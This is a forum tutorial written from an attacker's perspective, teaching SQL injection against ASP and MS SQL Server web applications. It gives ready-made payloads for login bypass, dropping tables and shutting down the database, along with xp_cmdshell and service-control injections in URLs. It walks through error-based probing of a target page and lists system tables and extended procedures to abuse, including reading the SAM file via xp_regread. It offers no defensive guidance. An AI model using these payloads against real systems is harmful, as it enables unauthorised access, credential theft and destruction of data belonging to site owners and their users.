Sign In
Register
Help
This topic is locked
Web Applications relay on dynamic content to achieve the appeal of traditional desktop windowing programss. This dynamism is typically achieved by retrieving updated data from a database. One of the more popular platforms for web datastores is SQL, and many web applications are based entirely on front-end scripts that simply query an SQL database, either on the web server itself or a spearate back-end system. One of the most insidious attacks on a web application involves hijacking the queries used by the front-end scripts themselves to attain control of the application or its data. One of the most efficient mechanisms for achieving this is a technique called SQL-Injection.
SQL-Injection refers to inputting raw Transact SQL queries into an application to perform an unexpected action. Often, existing queries are simply edited to achieve the same results-- Transact SQL is easily mnipulated by the placement of even a single character in a judiciously chosen spot, causing the entire query to behave in quite malicious ways. Some of the characters commonly used for such input validation attacks include the backtick ( ` ), the double dash ( -- ). and the semicolon ( ; ), all of which have special meaning in transact SQL.
What sorts of things can crafty hacker do with a usurped SQL query> Well, for starters, thy could potentially access unauthorized data. With even sneakier techniquies, they can bypass authentication or even gain complete control over the web server or back-end SQL system. Let's tak alook at what's possible.
Examples:
ByPassing Authentication
To authenticate without any credentials we can use,
Username : ' OR '=' Password : ' OR '='
To authenticate with just the username.
Username : admin'--
To authenticate as the first user in the users table.
Username : ' or 1=1--
To authenticate as fictional user
Username : ' union select 1, 'user', 'passwd' 1 --
Causing Destruction
To drop a database table
Username : ';drop table users--
To shut down the database remotely
Username:hackuin60shackuin60s' Password : '; shutdown--
Executing Function Calls and Stored Procedures
Executing xp_cmdshell to get a directory listing we can use
http://localhost/script?0';EXEC+master..xp_cmdshell+'dir';--
Executing xp_servicecontorl to manipulate services
http://localhost/script?0';EXEC+master..xp_servicecontrol+'start',+'server';--.
Description of SQL-Injection's.
Thank's to LaTozu, for suggestion for my previous post. As that was the just the basic's informaion of the SQL-Injection's. Now Let use Discuss in details of the SQL-Injection's.
Hackers Don't do thing's different, They do it Differently !! -- by hackuin60s!!
First we would understand the actull interaction between web server and database.
Web server Understand's only HTTP protocol,where as database understand's only specific language: SQL.
When a user logs in to site, the application require's two pieces of information.
> Username
> Password
The application takes this two pieces of information and creat's a SQL statement that will collect some type of information from the database. well, till now web-Server have performed action. Then after this action webserver will connect's to the database. This connection might be established once and maintained for along time, or established each time the two servers need to communicate. Either way, the Web server uses its own username and password to authenticate to the database.
So the authentication page on which user provide's information about username and password will pass the user credentials in as a SQL statement to the database. The database accepts the statement, executes it, then responds with something like " the username and password match" or " username not found. " It is upto authentication page to handle the response from the database.
If ypu are really serious of performing SQL-Injection's, Ask your self this question's.
> Can i pass raw ODBC
> Can i generate a database error in the application's
> I know error pages and error handlers inform me problems, does it provide me system information, variables or any other data
> I know string concatenation is the base of a secure SQL statement's, Can i manipulate the statement with tick mark's
>Does application running in a high-privilege situation, user account that webserver use's have read and write functionality can i write to Master database or perform backup duties
> Does HTML provide's me any information like table names, column names or SQL structures
> Can i manipulate the invalid input to determine the structure of the SQL statement
> Can i perform a combination of character's that execute proplerly
> Can i gather information about the application's database via SQL queries
> can i gather information about the system via SQL queries
Note:
> User-defined stored procedures are more difficult to break with SQL injection. They require a specific number of parameters in specific places in a specific format.
SQL Formatting Character's:
' Terminates a statement. Usaully used to delimit varibales within the query.
-- Single line comment. Ignores the remainder of the statement.
+ Space. required to correctly format a statement.
,@variable Appends variables. Helps identify stored procedures.
?Param1=dame&Param1=good Creates "Param=dame,good". Helps identify stored procedures.
@@variable Calls an internal server variable.
PRINT Returns an ODBC error, but does not target data.
SET Assigns variables. Useful for multiline SQL statements.
% A wildcard that matches any string of zero or more characters.
Know Let us get to expample's.
Let us try to generate error on this web page.
http://www.somesite....e.asp?motoId=30'
> Above we has used delimit character ( tick mark) with out delimiting it, i mean with out closing tick mark and here is the output on the page:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Unclosed quotation mark before the character string ', @UserID=143'. /somewhere.asp, line 9
> Actully above we have made a query with unclosed quotation mark.And our output provides us field name and the specific UserID we have been assigned. Umm @UserID is nothing but a part of parameter list which usually used in stored procedure.
Let us try with --comment.
http://www.somesite....e.asp?motoId=30--
And here is the output on the page:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server]Procedure 'rightmoto2' excepts parameter '@UserID', which was not supplied. /somewhere.asp, line 9
> That was intresting, actully above we are using double-dash to force SQL to process the remainder of the query as a comment. That mean's our data has passed through the stored procedure name rightmoto2, now please read the note above. Yes, we cannot rewrite the procedure's parameter list, even if we have UserID=150 is admin's( for example). Any way we need to try right!
http://www.somesite....e.asp?motoId=30,@UserID=150--
And here is the output on the page:
Microsoft VBScript runtime ( 0x400D984C ). Type mismatch: '[string: "30,@UserID=150--"]' /somewhere.asp, line 111
Opp's we are out of ODBC. We are in VBScript realm.
> Let us try without double-dash.
http://www.somesite....e.asp?motoID=30,@UserID=150
And here is the output:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server]Procedure or function rightmoto2 has too many rguments specified. /somewhere.asp, line 9
Ok,Ok.... enough error generators!!
Let see what happen's with PRINT command.
http://www.somesite....e.asp?motoID=30+PRINT
Here is the output:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Line 1: Incorrect syntax near ','.
> Actully we passed the PRINT command through the asp to the database. Have we created just error??
> For clarification let's misspel PRINT command.
http://www.somesite....e.asp?motoID=30+PRIN
Here is the output:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Line 1: Incorrect syntax near 'PRIN'.
nothing new just error again instead this time same syntax near PRIN, But soo after analyising the both the output we can see that in second out it say's "Incorect syntax at PRIN" But, at first input although we specified right command its tell " Incorrect syntax at ,(comma).what's that -- Nothing but succuss yeah because that comma indicates database accepted the PRINT statement, but was expecting something to print ( or some argument for a stored procedure). So ??
> Let query something related to database like microsoftversion.
http://somesite.com/...e.asp?motoID=30+PRINT+@@microsoftversion
Here is the output:
:D nothing happend.. ????
As @@microsoftversion is default MS SQL Server Variable, let us use some variable which doesn't exit's.
http://somesite.com/...e.asp?motoID=30+PRINT+@@L33TH4CK3R
Here is the output:
Microsoft OLE DB Provider for ODBC Drivers ( 0x123453D8) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Must declare the variable '@@L33TH4CK3R'.
Soo from this out we can say that our first ( @@microsoftvirson ) query was successfull but our application does not know to show the results. Because all it expect's to do is receive data from the rightmoto2 stored procedure.
> Default MS SQL Server variables.
@@connections @@max_connections @@servicename @@cpu_busy @@max_precision @@spid @@cursor_row @@microsoftversion @@textsize @@dbts @@nestlevel @@timeticks @@error @@options @@total_errors @@fetch_status @@pack_received @@toto_read @@identity @@pack_sent @@total_write @@idle @@packet_errors @@trancount @@io_busy @@procid @@version @@langid @@rowcount @@language @@servername
> SQL has a predefined list of keywords, or tokens, which has a special meanings.
> If you want to select data from a table, you use SELECT statement.
> Commonly used token's are SELECT, FROM, and WHERE.
Note:
A SQL injection can extend the query in order to retrive alternate information or generate an alway's true condition.
' OR 1=1 --'
Simple,
When a user log in with name say "h4hack" and password ummm say "d4dead", then query would be like
SELECT userid FROM login WHERE name='h4hack' AND password='d4dead'
Soo until and unless the state ments results in true the user cannot login. I mean until and unless the database query matches the entry the user cannot login.
when a user in put ' OR 1=1 --' in the field's. The query would be like
SELECT userid FROM login WHERE name='h4hack' AND password='d4dead' OR 1=1
Obeviously 1 is alway's equal to 1. and the condition is true. And you are in :D
Default system table or local tables.
1) syscolumns All column names and stored procedures for the current database, not just the master.
2) sysobjects, Every object ( such as stored procedures ) in the database.
3) sysusers, All of the users who can manipulate the database.
4) sysfiles, The file name and path for the ucrrent database and its log file.
5) systypes, Data types defined by SQL or new types defined by users.
> Usually we can request to cetain tables for example
SELECT * FROM sysusers and SELECT name FROM sysobjects WHERE type = 'P'
Here we have made a request query for sysusers and to certan field called stored procedures ( P ).
Default Master Tables
1) sysconfigures, Current database configuration settings.
2) sysdevices, Enumerates devices used for databases, logs, and temporary files.
3) syslogins, Enumerates user information for each user permitted to access the database.
4) sysremotelogins, Enumerates user informaion for each user permitted to remotely access the database or its stored procedures.
5) sysservers, Lists all peers that the server can access an OLE database server.
These tables provide detailed information on the operating system and database configurations. A SELECT from of these tables usually requires the "master.." indication:
SELECT * FROM master..sysremotelogins
Stored Procedures
1) sp_columns <table>
Most importantly, returns the coluimn names of a table.
2) sp_configure [name]
Returns internal database settings. Specify a perticular setting to retrieve just that value-- for example sp_configure ' remote query timeout(s)'.
3) sp_dboption
Views ( or sets ) user-configurable database options.
4) sp_depend <object>
Lists the tables associated with a stored procedure.
5) sp_helptext <object>
Describes the object. This is more useful for identifying areas where you can execute stored procedures. It rarely executes successfully.
5) sp_helpextendedproc
Lists all extended stored procedures.
6) sp_spaceused [object]
With no parameters, returns the database name(s), size, and unallocated space. If an object is specified it will describe the rows and other information as appropriate
7) sp_who2[username]
Far supeior to its anumeric cousin. It displays usernames, the host form which they've connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an otional username. This is an excellent way to enumerate a SQL database's users as opposed to application users.
Extended Stored Procedures
> Extend stored Procedures are used to execute the command's, usually with prefix of "xp_". Depending on the injection vector, you may not always be able to execute SQL statements that require a parameter.
> Windows 2000 enables syskey enabled by default. we can use the extended stored procedure like, xp_regread to grab the SAM file.
Extended stored Procedures list
1) xp_loginconfig
Displays login information, particularly the login mode(mixed, etc.) and default login.
2) xp_logininfo
Shows currently logged in accounts. Only applies to NTLM acounts
3) xp_msver
Lists SQL version and platform information.
4) xp_enumdsn
Enumerates ODBC data sources.
5) xp_enumgroups
Enumerates windows groups
6) xp_ntsec_enumdomains
Enumerates domains present on the network.
7) xp_cmdshell<command>
The equivalent of cmd.exe -- in other words, full command-line access to the database server. Cmd.exe is assumed, so you would only need to enter 'dir' to obtain a directory listing. The default current directory is the %SYSTEMROOT%\System32.
8) xp_regread<rootkey>,<key>,<value>
Reads a regostru va;ie from the Hive.
9) xp_reg*
There are several other registry-related procedures. Reading a value is the most usefull.
10) xp_serviccontrol<action>
STARTs or STOPs a windows service.
11) xp_terminate_process<PID>,<service>
Kills a process based on its process ID.
Hope it has given you Idea about how, when SQL-Injection's are implemented.
Thank You.
Remember you need allot of effort to get that work as you wanted try, try and try.
A man never fail's until and unless he stop's trying. :D
~hackuin60s!!
MultiQuote
